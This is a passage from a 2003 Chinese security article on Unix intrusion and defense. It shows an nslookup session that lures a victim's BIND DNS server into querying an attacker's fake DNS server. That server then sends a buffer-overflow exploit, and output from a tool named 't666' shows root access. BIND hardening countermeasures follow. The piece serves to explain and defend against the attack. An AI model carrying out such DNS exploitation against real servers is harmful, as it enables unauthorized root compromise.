首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>本站原创>linux原创>文章内容
unix入侵及防御心得(一)(2)
来源:www.vfocus.net 作者:vitter 发布时间:2003-01-05  

Default Server: localhost.attackers.org
Address: 127.0.0.1
> server 10.1.1.100
Default Server: dns.victim.net
Address: 10.1.1.100
> hash.attackers.org
Server: dns.victim.net
Address: 10.1.1.100

可以看到攻击者在其控制的独立系统上的交互模式运行nslookup。然后攻击者向受害的DNS服务器查询“hash.attackers.org”地址,这就使得dns.victim.net查询监听UDP 53端口的伪DNS服务器。一旦目标名字服务器连接到vitter,缓冲区溢出漏洞发掘程序就会发送到dns.victim.net上,并以root访问权限回报攻击者。

[root@vitter]# t666 1
Received request from 10.1.1.100:53 for hash.attackers.org type=1
id
uid=0(root) gid=0(root) groups=0(root)

攻击者虽然并没有真正的shell,但是仍以root特权发布命令。

DNS对策:在非DNS服务器上关闭并删去BIND。确保BIND版本是最新的并打上补丁。运行named要用非特权用户方式。named应以-t选项从chrooted()环境中运行。


注:未完待续,可是由于一些私人事情,我真的可能写不下去了,也许我真的需要时间调整心态了,在这里感谢大家的支持,感谢我的朋友。今天我发现我真的很心痛

www.safechina.net
vitter@safechina.net
2003.1.3


共6页: 上一页 [1] [2] [3] [4] [5] 6 下一页
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·OPENVPN安装手册
·openssh记录sftp详细日志,并chr
·ssh-3.2记录sftp日志,并且chroo
·用linux构建仗剑江湖mud游戏服务
·Linux高可用(HA)集群笔记heartbe
·关于日志记录系统设计思想
·unix入侵及防御心得(一)(1)
·linux下的Informix安装配置
·Informix的数据库优化
·Linux下apache运行mysql,cgi,p
·Linux下安装Oracle817完美解决版
·改的一个非GBK的JSP的webshell
  相关文章
·unix入侵及防御心得(一)(1)
·使用rsync从linux到linux或到win
·在VMware 4.5.1下运行Fedora Cor
·Fedora 1升级2.6.5内核
·如何给solaris打补丁
·关于日志记录系统设计思想
·Linux + Win me 2000 xp 用OS Lo
·忘记linux密码怎么办
·用linux构建仗剑江湖mud游戏服务
·OPENVPN安装手册
·Linux高可用(HA)集群笔记heartbe
·lvs+heard负载均衡文档(DR)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved